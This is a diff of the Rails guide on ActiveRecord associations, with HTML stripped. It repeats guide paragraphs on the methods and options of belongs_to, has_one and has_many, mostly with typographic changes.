This will work fine, because both the Supplier and the Account class are defined within the same scope. But this will not work, because Supplier and Account are defined in different scopes:

+end +

This will work fine, because both the Supplier and the Account class are defined within the same scope. But this will not work, because Supplier and Account are defined in different scopes:

belongs_to :supplier end end -end -
-

To associate a model with a model in a different scope, you must specify the complete class name in your association declaration:

+end +

To associate a model with a model in a different scope, you must specify the complete class name in your association declaration:

belongs_to :supplier, :class_name => "MyApplication::Business::Supplier" end end -end -
+end

4. Detailed Association Reference

-

The following sections give the details of each type of association, including the methods that they add and the options that you can use when declaring an association.

+

The following sections give the details of each type of association, including the methods that they add and the options that you can use when declaring an association.

4.1. The belongs_to Association

-

The belongs_to association creates a one-to-one match with another model. In database terms, this association says that this class contains the foreign key. If the other class contains the foreign key, then you should use has_one instead.

+

The belongs_to association creates a one-to-one match with another model. In database terms, this association says that this class contains the foreign key. If the other class contains the foreign key, then you should use has_one instead.

4.1.1. Methods Added by belongs_to

-

When you declare a belongs_to assocation, the declaring class automatically gains five methods related to the association:

-
    +

    When you declare a belongs_to assocation, the declaring class automatically gains five methods related to the association:

    +
    • association(force_reload = false) @@ -912,7 +882,7 @@ http://www.gnu.org/software/src-highlite -->

    -

    In all of these methods, association is replaced with the symbol passed as the first argument to belongs_to. For example, given the declaration:

    +

    In all of these methods, association is replaced with the symbol passed as the first argument to belongs_to. For example, given the declaration:

    class Order < ActiveRecord::Base
       belongs_to :customer
    -end
    -
    -

    Each instance of the order model will have these methods:

    +end
+

Each instance of the order model will have these methods:

customer= customer.nil? build_customer -create_customer -
+create_customer
association(force_reload = false)
-

The association method returns the associated object, if any. If no associated object is found, it returns nil.

+

The association method returns the associated object, if any. If no associated object is found, it returns nil.

-
@customer = @order.customer
-
-

If the associated object has already been retrieved from the database for this object, the cached version will be returned. To override this behavior (and force a database read), pass true as the force_reload argument.

+
@customer = @order.customer
+

If the associated object has already been retrieved from the database for this object, the cached version will be returned. To override this behavior (and force a database read), pass true as the force_reload argument.

association=(associate)
-

The association= method assigns an associated object to this object. Behind the scenes, this means extracting the primary key from the associate object and setting this object's foreign key to the same value.

+

The association= method assigns an associated object to this object. Behind the scenes, this means extracting the primary key from the associate object and setting this object’s foreign key to the same value.

-
@order.customer = @customer
-
+
@order.customer = @customer
association.nil?
-

The association.nil? method returns true if there is no associated object.

+

The association.nil? method returns true if there is no associated object.

if @order.customer.nil?
   @msg = "No customer found for this order"
-end
-
+end
build_association(attributes = {})
-

The build_association method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through this object's foreign key will be set, but the associated object will _not_ yet be saved.

+

The build_association method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through this object’s foreign key will be set, but the associated object will not yet be saved.

-
@customer = @order.build_customer({:customer_number => 123, :customer_name => "John Doe"})
-
+
@customer = @order.build_customer({:customer_number => 123, :customer_name => "John Doe"})
create_association(attributes = {})
-

The create_association method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through this object's foreign key will be set. In addition, the associated object _will_ be saved (assuming that it passes any validations).

+

The create_association method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through this object’s foreign key will be set. In addition, the associated object will be saved (assuming that it passes any validations).

-
@customer = @order.create_customer({:customer_number => 123, :customer_name => "John Doe"})
-
+
@customer = @order.create_customer({:customer_number => 123, :customer_name => "John Doe"})

4.1.2. Options for belongs_to

-

In many situations, you can use the default behavior of belongs_to without any customization. But despite Rails' emphasis of convention over customization, you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a belongs_to association. For example, an association with several options might look like this:

+

In many situations, you can use the default behavior of belongs_to without any customization. But despite Rails' emphasis of convention over customization, you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a belongs_to association. For example, an association with several options might look like this:

class Order < ActiveRecord::Base
   belongs_to :customer, :counter_cache => true, :conditions => "active = 1"
-end
-
-

The belongs_to association supports these options:

-
    +end
+

The belongs_to association supports these options:

+
  • :class_name @@ -1047,7 +1009,7 @@ http://www.gnu.org/software/src-highlite -->

:class_name
-

If the name of the other model cannot be derived from the association name, you can use the :class_name option to supply the model name. For example, if an order belongs to a customer, but the actual name of the model containing customers is Patron, you'd set things up this way:

+

If the name of the other model cannot be derived from the association name, you can use the :class_name option to supply the model name. For example, if an order belongs to a customer, but the actual name of the model containing customers is Patron, you’d set things up this way:

class Order < ActiveRecord::Base
   belongs_to :customer, :class_name => "Patron"
-end
-
+end
:conditions
-

The :conditions option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL WHERE clause).

+

The :conditions option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL WHERE clause).

class Order < ActiveRecord::Base
   belongs_to :customer, :conditions => "active = 1"
-end
-
+end
:counter_cache
-

The :counter_cache option can be used to make finding the number of belonging objects more efficient. Consider these models:

+

The :counter_cache option can be used to make finding the number of belonging objects more efficient. Consider these models:

end class Customer < ActiveRecord::Base has_many :orders -end -
-

With these declarations, asking for the value of @customer.orders.size requires making a call to the database to perform a COUNT(*) query. To avoid this call, you can add a counter cache to the belonging model:

+end +

With these declarations, asking for the value of @customer.orders.size requires making a call to the database to perform a COUNT(*) query. To avoid this call, you can add a counter cache to the belonging model:

end class Customer < ActiveRecord::Base has_many :orders -end -
-

With this declaration, Rails will keep the cache value up to date, and then return that value in response to the .size method.

-

Although the :counter_cache option is specified on the model that includes the belongs_to declaration, the actual column must be added to the associated model. In the case above, you would need to add a column named orders_count to the Customer model. You can override the default column name if you need to:

+end +

With this declaration, Rails will keep the cache value up to date, and then return that value in response to the .size method.

+

Although the :counter_cache option is specified on the model that includes the belongs_to declaration, the actual column must be added to the associated model. In the case above, you would need to add a column named orders_count to the Customer model. You can override the default column name if you need to:

end class Customer < ActiveRecord::Base has_many :orders -end -
-

Counter cache columns are added to the containing model's list of read-only attributes through attr_readonly.

+end +

Counter cache columns are added to the containing model’s list of read-only attributes through attr_readonly.

:dependent
-

If you set the :dependent option to :destroy, then deleting this object will call the destroy method on the associated object to delete that object. If you set the :dependent option to :delete, then deleting this object will delete the associated object without calling its destroy method.

+

If you set the :dependent option to :destroy, then deleting this object will call the destroy method on the associated object to delete that object. If you set the :dependent option to :delete, then deleting this object will delete the associated object without calling its destroy method.

@@ -1121,7 +1078,7 @@ http://www.gnu.org/software/src-highlite -->
:foreign_key
-

By convention, Rails guesses that the column used to hold the foreign key on this model is the name of the association with the suffix _id added. The :foreign_key option lets you set the name of the foreign key directly:

+

By convention, Rails guesses that the column used to hold the foreign key on this model is the name of the association with the suffix _id added. The :foreign_key option lets you set the name of the foreign key directly:

class Order < ActiveRecord::Base
   belongs_to :customer, :class_name => "Patron", :foreign_key => "patron_id"
-end
-
+end
@@ -1140,7 +1096,7 @@ http://www.gnu.org/software/src-highlite -->
:include
-

You can use the :include option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models:

+

You can use the :include option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models:

end class Customer < ActiveRecord::Base has_many :orders -end -
-

If you frequently retrieve customers directly from line items (@line_item.order.customer), then you can make your code somewhat more efficient by including customers in the association from line items to orders:

+end +

If you frequently retrieve customers directly from line items (@line_item.order.customer), then you can make your code somewhat more efficient by including customers in the association from line items to orders:

end class Customer < ActiveRecord::Base has_many :orders -end -
+end
- +
Note There's no need to use :include for immediate associations - that is, if you have Order belongs_to :customer, then the customer is eager-loaded automatically when it's needed.There’s no need to use :include for immediate associations - that is, if you have Order belongs_to :customer, then the customer is eager-loaded automatically when it’s needed.
:polymorphic
-

Passing true to the :polymorphic option indicates that this is a polymorphic association. Polymorphic associations were discussed in detail earlier in this guide.

+

Passing true to the :polymorphic option indicates that this is a polymorphic association. Polymorphic associations were discussed in detail earlier in this guide.

:readonly
-

If you set the :readonly option to true, then the associated object will be read-only when retrieved via the association.

+

If you set the :readonly option to true, then the associated object will be read-only when retrieved via the association.

:select
-

The :select option lets you override the SQL SELECT clause that is used to retrieve data about the associated object. By default, Rails retrieves all columns.

+

The :select option lets you override the SQL SELECT clause that is used to retrieve data about the associated object. By default, Rails retrieves all columns.

@@ -1197,14 +1151,14 @@ http://www.gnu.org/software/src-highlite -->
:validate
-

If you set the :validate option to true, then associated objects will be validated whenever you save this object. By default, this is false: associated objects will not be validated when this object is saved.

+

If you set the :validate option to true, then associated objects will be validated whenever you save this object. By default, this is false: associated objects will not be validated when this object is saved.

4.1.3. When are Objects Saved?

-

Assigning an object to a belongs_to association does not automatically save the object. It does not save the associated object either.

+

Assigning an object to a belongs_to association does not automatically save the object. It does not save the associated object either.

4.2. The has_one Association

-

The has_one association creates a one-to-one match with another model. In database terms, this association says that the other class contains the foreign key. If this class contains the foreign key, then you should use belongs_to instead.

+

The has_one association creates a one-to-one match with another model. In database terms, this association says that the other class contains the foreign key. If this class contains the foreign key, then you should use belongs_to instead.

4.2.1. Methods Added by has_one

-

When you declare a has_one association, the declaring class automatically gains five methods related to the association:

-
    +

    When you declare a has_one association, the declaring class automatically gains five methods related to the association:

    +
    • association(force_reload = false) @@ -1231,7 +1185,7 @@ http://www.gnu.org/software/src-highlite -->

    -

    In all of these methods, association is replaced with the symbol passed as the first argument to has_one. For example, given the declaration:

    +

    In all of these methods, association is replaced with the symbol passed as the first argument to has_one. For example, given the declaration:

    class Supplier < ActiveRecord::Base
       has_one :account
    -end
    -
    -

    Each instance of the Supplier model will have these methods:

    +end
+

Each instance of the Supplier model will have these methods:

account= account.nil? build_account -create_account -
+create_account
association(force_reload = false)
-

The association method returns the associated object, if any. If no associated object is found, it returns nil.

+

The association method returns the associated object, if any. If no associated object is found, it returns nil.

-
@account = @supplier.account
-
-

If the associated object has already been retrieved from the database for this object, the cached version will be returned. To override this behavior (and force a database read), pass true as the force_reload argument.

+
@account = @supplier.account
+

If the associated object has already been retrieved from the database for this object, the cached version will be returned. To override this behavior (and force a database read), pass true as the force_reload argument.

association=(associate)
-

The association= method assigns an associated object to this object. Behind the scenes, this means extracting the primary key from this object and setting the associate object's foreign key to the same value.

+

The association= method assigns an associated object to this object. Behind the scenes, this means extracting the primary key from this object and setting the associate object’s foreign key to the same value.

-
@suppler.account = @account
-
+
@suppler.account = @account
association.nil?
-

The association.nil? method returns true if there is no associated object.

+

The association.nil? method returns true if there is no associated object.

if @supplier.account.nil?
   @msg = "No account found for this supplier"
-end
-
+end
build_association(attributes = {})
-

The build_association method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through its foreign key will be set, but the associated object will _not_ yet be saved.

+

The build_association method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through its foreign key will be set, but the associated object will not yet be saved.

-
@account = @supplier.build_account({:terms => "Net 30"})
-
+
@account = @supplier.build_account({:terms => "Net 30"})
create_association(attributes = {})
-

The create_association method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through its foreign key will be set. In addition, the associated object _will_ be saved (assuming that it passes any validations).

+

The create_association method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through its foreign key will be set. In addition, the associated object will be saved (assuming that it passes any validations).

-
@account = @supplier.create_account({:terms => "Net 30"})
-
+
@account = @supplier.create_account({:terms => "Net 30"})

4.2.2. Options for has_one

-

In many situations, you can use the default behavior of has_one without any customization. But despite Rails' emphasis of convention over customization, you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a has_one association. For example, an association with several options might look like this:

+

In many situations, you can use the default behavior of has_one without any customization. But despite Rails' emphasis of convention over customization, you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a has_one association. For example, an association with several options might look like this:

class Supplier < ActiveRecord::Base
   has_one :account, :class_name => "Billing", :dependent => :nullify
-end
-
-

The has_one association supports these options:

-
    +end
+

The has_one association supports these options:

+
  • :as @@ -1386,9 +1332,9 @@ http://www.gnu.org/software/src-highlite -->

:as
-

Setting the :as option indicates that this is a polymorphic association. Polymorphic associations are discussed in detail later in this guide.

+

Setting the :as option indicates that this is a polymorphic association. Polymorphic associations are discussed in detail later in this guide.

:class_name
-

If the name of the other model cannot be derived from the association name, you can use the :class_name option to supply the model name. For example, if a supplier has an account, but the actual name of the model containing accounts is Billing, you'd set things up this way:

+

If the name of the other model cannot be derived from the association name, you can use the :class_name option to supply the model name. For example, if a supplier has an account, but the actual name of the model containing accounts is Billing, you’d set things up this way:

class Supplier < ActiveRecord::Base
   has_one :account, :class_name => "Billing"
-end
-
+end
:conditions
-

The :conditions option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL WHERE clause).

+

The :conditions option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL WHERE clause).

class Supplier < ActiveRecord::Base
   has_one :account, :conditions => "confirmed = 1"
-end
-
+end
:dependent
-

If you set the :dependent option to :destroy, then deleting this object will call the destroy method on the associated object to delete that object. If you set the :dependent option to :delete, then deleting this object will delete the associated object without calling its destroy method. If you set the :dependent option to :nullify, then deleting this object will set the foreign key in the association object to NULL.

+

If you set the :dependent option to :destroy, then deleting this object will call the destroy method on the associated object to delete that object. If you set the :dependent option to :delete, then deleting this object will delete the associated object without calling its destroy method. If you set the :dependent option to :nullify, then deleting this object will set the foreign key in the association object to NULL.

:foreign_key
-

By convention, Rails guesses that the column used to hold the foreign key on the other model is the name of this model with the suffix _id added. The :foreign_key option lets you set the name of the foreign key directly:

+

By convention, Rails guesses that the column used to hold the foreign key on the other model is the name of this model with the suffix _id added. The :foreign_key option lets you set the name of the foreign key directly:

class Supplier < ActiveRecord::Base
   has_one :account, :foreign_key => "supp_id"
-end
-
+end
@@ -1431,7 +1374,7 @@ http://www.gnu.org/software/src-highlite -->
:include
-

You can use the :include option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models:

+

You can use the :include option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models:

end class Representative < ActiveRecord::Base has_many :accounts -end -
-

If you frequently retrieve representatives directly from suppliers (@supplier.account.representative), then you can make your code somewhat more efficient by including representatives in the association from suppliers to accounts:

+end +

If you frequently retrieve representatives directly from suppliers (@supplier.account.representative), then you can make your code somewhat more efficient by including representatives in the association from suppliers to accounts:

end class Representative < ActiveRecord::Base has_many :accounts -end -
+end
:order
-

The :order option dictates the order in which associated objects will be received (in the syntax used by a SQL ORDER BY clause). Because a has_one association will only retrieve a single associated object, this option should not be needed.

+

The :order option dictates the order in which associated objects will be received (in the syntax used by a SQL ORDER BY clause). Because a has_one association will only retrieve a single associated object, this option should not be needed.

:primary_key
-

By convention, Rails guesses that the column used to hold the primary key of this model is id. You can override this and explicitly specify the primary key with the :primary_key option.

+

By convention, Rails guesses that the column used to hold the primary key of this model is id. You can override this and explicitly specify the primary key with the :primary_key option.

:readonly
-

If you set the :readonly option to true, then the associated object will be read-only when retrieved via the association.

+

If you set the :readonly option to true, then the associated object will be read-only when retrieved via the association.

:select
-

The :select option lets you override the SQL SELECT clause that is used to retrieve data about the associated object. By default, Rails retrieves all columns.

+

The :select option lets you override the SQL SELECT clause that is used to retrieve data about the associated object. By default, Rails retrieves all columns.

:source
-

The :source option specifies the source association name for a has_one :through association.

+

The :source option specifies the source association name for a has_one :through association.

:source_type
-

The :source_type option specifies the source association type for a has_one :through association that proceeds through a polymorphic association.

+

The :source_type option specifies the source association type for a has_one :through association that proceeds through a polymorphic association.

:through
-

The :through option specifies a join model through which to perform the query. has_one :through associations are discussed in detail later in this guide.

+

The :through option specifies a join model through which to perform the query. has_one :through associations are discussed in detail later in this guide.

:validate
-

If you set the :validate option to true, then associated objects will be validated whenever you save this object. By default, this is false: associated objects will not be validated when this object is saved.

+

If you set the :validate option to true, then associated objects will be validated whenever you save this object. By default, this is false: associated objects will not be validated when this object is saved.

4.2.3. When are Objects Saved?

-

When you assign an object to a has_one association, that object is automatically saved (in order to update its foreign key). In addition, any object being replaced is also automatically saved, because its foreign key will change too.

-

If either of these saves fails due to validation errors, then the assignment statement returns false and the assignment itself is cancelled.

-

If the parent object (the one declaring the has_one association) is unsaved (that is, new_record? returns true) then the child objects are not saved.

-

If you want to assign an object to a has_one association without saving the object, use the association.build method.

+

When you assign an object to a has_one association, that object is automatically saved (in order to update its foreign key). In addition, any object being replaced is also automatically saved, because its foreign key will change too.

+

If either of these saves fails due to validation errors, then the assignment statement returns false and the assignment itself is cancelled.

+

If the parent object (the one declaring the has_one association) is unsaved (that is, new_record? returns true) then the child objects are not saved.

+

If you want to assign an object to a has_one association without saving the object, use the association.build method.

4.3. The has_many Association

-

The has_many association creates a one-to-many relationship with another model. In database terms, this association says that the other class will have a foreign key that refers to instances of this class.

+

The has_many association creates a one-to-many relationship with another model. In database terms, this association says that the other class will have a foreign key that refers to instances of this class.

4.3.1. Methods Added

-

When you declare a has_many association, the declaring class automatically gains 13 methods related to the association:

-
    +

    When you declare a has_many association, the declaring class automatically gains 13 methods related to the association:

    +
    • collection(force_reload = false) @@ -1498,12 +1439,12 @@ http://www.gnu.org/software/src-highlite -->

    • -collection<<(object, …) +collection<<(object, ...)

    • -collection.delete(object, …) +collection.delete(object, ...)

    • @@ -1513,12 +1454,12 @@ http://www.gnu.org/software/src-highlite -->
    • -collection_singular_ids +collection\_singular\_ids

    • -collection_singular_ids=ids +collection\_singular\_ids=ids

    • @@ -1538,17 +1479,17 @@ http://www.gnu.org/software/src-highlite -->
    • -collection.find(…) +collection.find(...)

    • -collection.exist?(…) +collection.exist?(...)

    • -collection.build(attributes = {}, …) +collection.build(attributes = {}, ...)

    • @@ -1557,7 +1498,7 @@ http://www.gnu.org/software/src-highlite -->

    -

    In all of these methods, collection is replaced with the symbol passed as the first argument to has_many, and collection_singular is replaced with the singularized version of that symbol.. For example, given the declaration:

    +

    In all of these methods, collection is replaced with the symbol passed as the first argument to has_many, and collection\_singular is replaced with the singularized version of that symbol.. For example, given the declaration:

    class Customer < ActiveRecord::Base
       has_many :orders
    -end
    -
    -

    Each instance of the customer model will have these methods:

    +end
+

Each instance of the customer model will have these methods:

-
@orders = @customer.orders
-
-
collection<<(object, …)
-

The collection<< method adds one or more objects to the collection by setting their foreign keys to the primary key of the calling model.

+
@orders = @customer.orders
+
collection<<(object, ...)
+

The collection<< method adds one or more objects to the collection by setting their foreign keys to the primary key of the calling model.

-
@customer.orders << @order1
-
-
collection.delete(object, …)
-

The collection.delete method removes one or more objects from the collection by setting their foreign keys to NULL.

+
@customer.orders << @order1
+
collection.delete(object, ...)
+

The collection.delete method removes one or more objects from the collection by setting their foreign keys to NULL.

-
@customer.orders.delete(@order1)
-
+
@customer.orders.delete(@order1)
- +
Warning Objects will be in addition destroyed if they're associated with :dependent ⇒ :destroy, and deleted if they're associated with :dependent ⇒ :delete_all.Objects will be in addition destroyed if they’re associated with :dependent => :destroy, and deleted if they’re associated with :dependent => :delete_all.
collection=objects
-

The collection= method makes the collection contain only the supplied objects, by adding and deleting as appropriate.

-
collection_singular_ids
-

The collection_singular_ids method returns an array of the ids of the objects in the collection.

+

The collection= method makes the collection contain only the supplied objects, by adding and deleting as appropriate.

+
collection\_singular\_ids
+

The collection\_singular\_ids method returns an array of the ids of the objects in the collection.

-
@order_ids = @customer.order_ids
-
-
_collection_singular_ids=ids
-

The _collection_singular_ids= method makes the collection contain only the objects identified by the supplied primary key values, by adding and deleting as appropriate.

+
@order_ids = @customer.order_ids
+
_collection\_singular\_ids=ids
+

The _collection\_singular\_ids= method makes the collection contain only the objects identified by the supplied primary key values, by adding and deleting as appropriate.

collection.clear
-

The collection.clear method removes every object from the collection. This destroys the associated objects if they are associated with :dependent ⇒ :destroy, deletes them directly from the database if :dependent ⇒ :delete_all, and otherwise sets their foreign keys to NULL.

+

The collection.clear method removes every object from the collection. This destroys the associated objects if they are associated with :dependent => :destroy, deletes them directly from the database if :dependent => :delete_all, and otherwise sets their foreign keys to NULL.

collection.empty?
-

The collection.empty? method returns true if the collection does not contain any associated objects.

+

The collection.empty? method returns true if the collection does not contain any associated objects.

<% if @customer.orders.empty? %>
   No Orders Found
-<% end %>
-
+<% end %>
collection.size
-

The collection.size method returns the number of objects in the collection.

+

The collection.size method returns the number of objects in the collection.

-
@order_count = @customer.orders.size
-
-
collection.find(…)
-

The collection.find method finds objects within the collection. It uses the same syntax and options as ActiveRecord::Base.find.

+
@order_count = @customer.orders.size
+
collection.find(...)
+

The collection.find method finds objects within the collection. It uses the same syntax and options as ActiveRecord::Base.find.

-
@open_orders = @customer.orders.find(:all, :conditions => "open = 1")
-
-
collection.exist?(…)
-

The collection.exist? method checks whether an object meeting the supplied conditions exists in the collection. It uses the same syntax and options as ActiveRecord::Base.exists?.

-
collection.build(attributes = {}, …)
-

The collection.build method returns one or more new objects of the associated type. These objects will be instantiated from the passed attributes, and the link through their foreign key will be created, but the associated objects will not yet be saved.

+
@open_orders = @customer.orders.find(:all, :conditions => "open = 1")
+
collection.exist?(...)
+

The collection.exist? method checks whether an object meeting the supplied conditions exists in the collection. It uses the same syntax and options as ActiveRecord::Base.exists?.

+
collection.build(attributes = {}, ...)
+

The collection.build method returns one or more new objects of the associated type. These objects will be instantiated from the passed attributes, and the link through their foreign key will be created, but the associated objects will not yet be saved.

-
@order = @customer.orders.build({:order_date => Time.now, :order_number => "A12345"})
-
+
@order = @customer.orders.build({:order_date => Time.now, :order_number => "A12345"})
collection.create(attributes = {})
-

The collection.create method returns a new object of the associated type. This object will be instantiated from the passed attributes, the link through its foreign key will be created, and the associated object will be saved (assuming that it passes any validations).

+

The collection.create method returns a new object of the associated type. This object will be instantiated from the passed attributes, the link through its foreign key will be created, and the associated object will be saved (assuming that it passes any validations).

-
@order = @customer.orders.create({:order_date => Time.now, :order_number => "A12345"})
-
+
@order = @customer.orders.create({:order_date => Time.now, :order_number => "A12345"})

4.3.2. Options for has_many

-

In many situations, you can use the default behavior for has_many without any customization. But you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a has_many association. For example, an association with several options might look like this:

+

In many situations, you can use the default behavior for has_many without any customization. But you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a has_many association. For example, an association with several options might look like this:

class Customer < ActiveRecord::Base
   has_many :orders, :dependent => :delete_all, :validate => :false
-end
-
-

The has_many association supports these options:

-
    +end
+

The has_many association supports these options:

+
  • :as @@ -1806,9 +1735,9 @@ http://www.gnu.org/software/src-highlite -->

:as
-

Setting the :as option indicates that this is a polymorphic association, as discussed earlier in this guide.

+

Setting the :as option indicates that this is a polymorphic association, as discussed earlier in this guide.

:class_name
-

If the name of the other model cannot be derived from the association name, you can use the :class_name option to supply the model name. For example, if a customer has many orders, but the actual name of the model containing orders is Transaction, you'd set things up this way:

+

If the name of the other model cannot be derived from the association name, you can use the :class_name option to supply the model name. For example, if a customer has many orders, but the actual name of the model containing orders is Transaction, you’d set things up this way:

class Customer < ActiveRecord::Base
   has_many :orders, :class_name => "Transaction"
-end
-
+end
:conditions
-

The :conditions option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL WHERE clause).

+

The :conditions option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL WHERE clause).

class Customer < ActiveRecord::Base
   has_many :confirmed_orders, :class_name => "Order", :conditions => "confirmed = 1"
-end
-
-

You can also set conditions via a hash:

+end +

You can also set conditions via a hash:

class Customer < ActiveRecord::Base
   has_many :confirmed_orders, :class_name => "Order", :conditions => { :confirmed => true }
-end
-
-

If you use a hash-style :conditions option, then record creation via this association will be automatically scoped using the hash. In this case, using @customer.confirmed_orders.create or @customer.confirmed_orders.build will create orders where the confirmed column has the value true.

+end +

If you use a hash-style :conditions option, then record creation via this association will be automatically scoped using the hash. In this case, using @customer.confirmed_orders.create or @customer.confirmed_orders.build will create orders where the confirmed column has the value true.

:counter_sql
-

Normally Rails automatically generates the proper SQL to count the association members. With the :counter_sql option, you can specify a complete SQL statement to count them yourself.

+

Normally Rails automatically generates the proper SQL to count the association members. With the :counter_sql option, you can specify a complete SQL statement to count them yourself.

- +
Note If you specify :finder_sql but not :counter_sql, then the counter SQL will be generated by substituting SELECT COUNT(*) FROM for the SELECT … FROM clause of your :finder_sql statement.If you specify :finder_sql but not :counter_sql, then the counter SQL will be generated by substituting SELECT COUNT(*) FROM for the SELECT ... FROM clause of your :finder_sql statement.
:dependent
-

If you set the :dependent option to :destroy, then deleting this object will call the destroy method on the associated objects to delete those objects. If you set the :dependent option to :delete_all, then deleting this object will delete the associated objects without calling their destroy method. If you set the :dependent option to :nullify, then deleting this object will set the foreign key in the associated objects to NULL.

+

If you set the :dependent option to :destroy, then deleting this object will call the destroy method on the associated objects to delete those objects. If you set the :dependent option to :delete_all, then deleting this object will delete the associated objects without calling their destroy method. If you set the :dependent option to :nullify, then deleting this object will set the foreign key in the associated objects to NULL.

@@ -1861,11 +1787,11 @@ http://www.gnu.org/software/src-highlite -->
:extend
-

The :extend option specifies a named module to extend the association proxy. Association extensions are discussed in detail later in this guide.

+

The :extend option specifies a named module to extend the association proxy. Association extensions are discussed in detail later in this guide.

:finder_sql
-

Normally Rails automatically generates the proper SQL to fetch the association members. With the :finder_sql option, you can specify a complete SQL statement to fetch them yourself. If fetching objects requires complex multi-table SQL, this may be necessary.

+

Normally Rails automatically generates the proper SQL to fetch the association members. With the :finder_sql option, you can specify a complete SQL statement to fetch them yourself. If fetching objects requires complex multi-table SQL, this may be necessary.

:foreign_key
-

By convention, Rails guesses that the column used to hold the foreign key on the other model is the name of this model with the suffix _id added. The :foreign_key option lets you set the name of the foreign key directly:

+

By convention, Rails guesses that the column used to hold the foreign key on the other model is the name of this model with the suffix _id added. The :foreign_key option lets you set the name of the foreign key directly:

class Customer < ActiveRecord::Base
   has_many :orders, :foreign_key => "cust_id"
-end
-
+end
@@ -1884,7 +1809,7 @@ http://www.gnu.org/software/src-highlite -->
:group
-

The :group option supplies an attribute name to group the result set by, using a GROUP BY clause in the finder SQL.

+

The :group option supplies an attribute name to group the result set by, using a GROUP BY clause in the finder SQL.

class Customer < ActiveRecord::Base
   has_many :line_items, :through => :orders, :group => "orders.id"
-end
-
+end
:include
-

You can use the :include option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models:

+

You can use the :include option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models:

end class LineItem < ActiveRecord::Base belongs_to :order -end -
-

If you frequently retrieve line items directly from customers (@customer.orders.line_items), then you can make your code somewhat more efficient by including line items in the association from customers to orders:

+end +

If you frequently retrieve line items directly from customers (@customer.orders.line_items), then you can make your code somewhat more efficient by including line items in the association from customers to orders:

end class LineItem < ActiveRecord::Base belongs_to :order -end -
+end
:limit
-

The :limit option lets you restrict the total number of objects that will be fetched through an association.

+

The :limit option lets you restrict the total number of objects that will be fetched through an association.

class Customer < ActiveRecord::Base
   has_many :recent_orders, :class_name => "Order", :order => "order_date DESC", :limit => 100
-end
-
+end
:offset
-

The :offset option lets you specify the starting offset for fetching objects via an association. For example, if you set :offset ⇒ 11, it will skip the first 11 records.

+

The :offset option lets you specify the starting offset for fetching objects via an association. For example, if you set :offset => 11, it will skip the first 11 records.

:order
-

The :order option dictates the order in which associated objects will be received (in the syntax used by a SQL ORDER BY clause).

+

The :order option dictates the order in which associated objects will be received (in the syntax used by a SQL ORDER BY clause).

class Customer < ActiveRecord::Base
   has_many :orders, :order => "date_confirmed DESC"
-end
-
+end
:primary_key
-

By convention, Rails guesses that the column used to hold the primary key of this model is id. You can override this and explicitly specify the primary key with the :primary_key option.

+

By convention, Rails guesses that the column used to hold the primary key of this model is id. You can override this and explicitly specify the primary key with the :primary_key option.

:readonly
-

If you set the :readonly option to true, then the associated objects will be read-only when retrieved via the association.

+

If you set the :readonly option to true, then the associated objects will be read-only when retrieved via the association.

:select
-

The :select option lets you override the SQL SELECT clause that is used to retrieve data about the associated objects. By default, Rails retrieves all columns.

+

The :select option lets you override the SQL SELECT clause that is used to retrieve data about the associated objects. By default, Rails retrieves all columns.

@@ -1968,25 +1888,25 @@ http://www.gnu.org/software/src-highlite -->
:source
-

The :source option specifies the source association name for a has_many :through association. You only need to use this option if the name of the source association cannot be automatically inferred from the association name.

+

The :source option specifies the source association name for a has_many :through association. You only need to use this option if the name of the source association cannot be automatically inferred from the association name.

:source_type
-

The :source_type option specifies the source association type for a has_many :through association that proceeds through a polymorphic association.

+

The :source_type option specifies the source association type for a has_many :through association that proceeds through a polymorphic association.

:through
-

The :through option specifies a join model through which to perform the query. has_many :through associations provide a way to implement many-to-many relationships, as discussed earlier in this guide.

+

The :through option specifies a join model through which to perform the query. has_many :through associations provide a way to implement many-to-many relationships, as discussed earlier in this guide.

:uniq
-

Specify the :uniq ⇒ true option to remove duplicates from the collection. This is most useful in conjunction with the :through option.

+

Specify the :uniq => true option to remove duplicates from the collection. This is most useful in conjunction with the :through option.

:validate
-

If you set the :validate option to false, then associated objects will not be validated whenever you save this object. By default, this is true: associated objects will be validated when this object is saved.

+

If you set the :validate option to false, then associated objects will not be validated whenever you save this object. By default, this is true: associated objects will be validated when this object is saved.

4.3.3. When are Objects Saved?

-

When you assign an object to a has_many association, that object is automatically saved (in order to update its foreign key). If you assign multiple objects in one statement, then they are all saved.

-

If any of these saves fails due to validation errors, then the assignment statement returns false and the assignment itself is cancelled.

-

If the parent object (the one declaring the has_many association) is unsaved (that is, new_record? returns true) then the child objects are not saved when they are added. All unsaved members of the association will automatically be saved when the parent is saved.

-

If you want to assign an object to a has_many association without saving the object, use the collection.build method.

+

When you assign an object to a has_many association, that object is automatically saved (in order to update its foreign key). If you assign multiple objects in one statement, then they are all saved.

+

If any of these saves fails due to validation errors, then the assignment statement returns false and the assignment itself is cancelled.

+

If the parent object (the one declaring the has_many association) is unsaved (that is, new_record? returns true) then the child objects are not saved when they are added. All unsaved members of the association will automatically be saved when the parent is saved.

+

If you want to assign an object to a has_many association without saving the object, use the collection.build method.

4.4. The has_and_belongs_to_many Association

-

The has_and_belongs_to_many association creates a many-to-many relationship with another model. In database terms, this associates two classes via an intermediate join table that includes foreign keys referring to each of the classes.

+

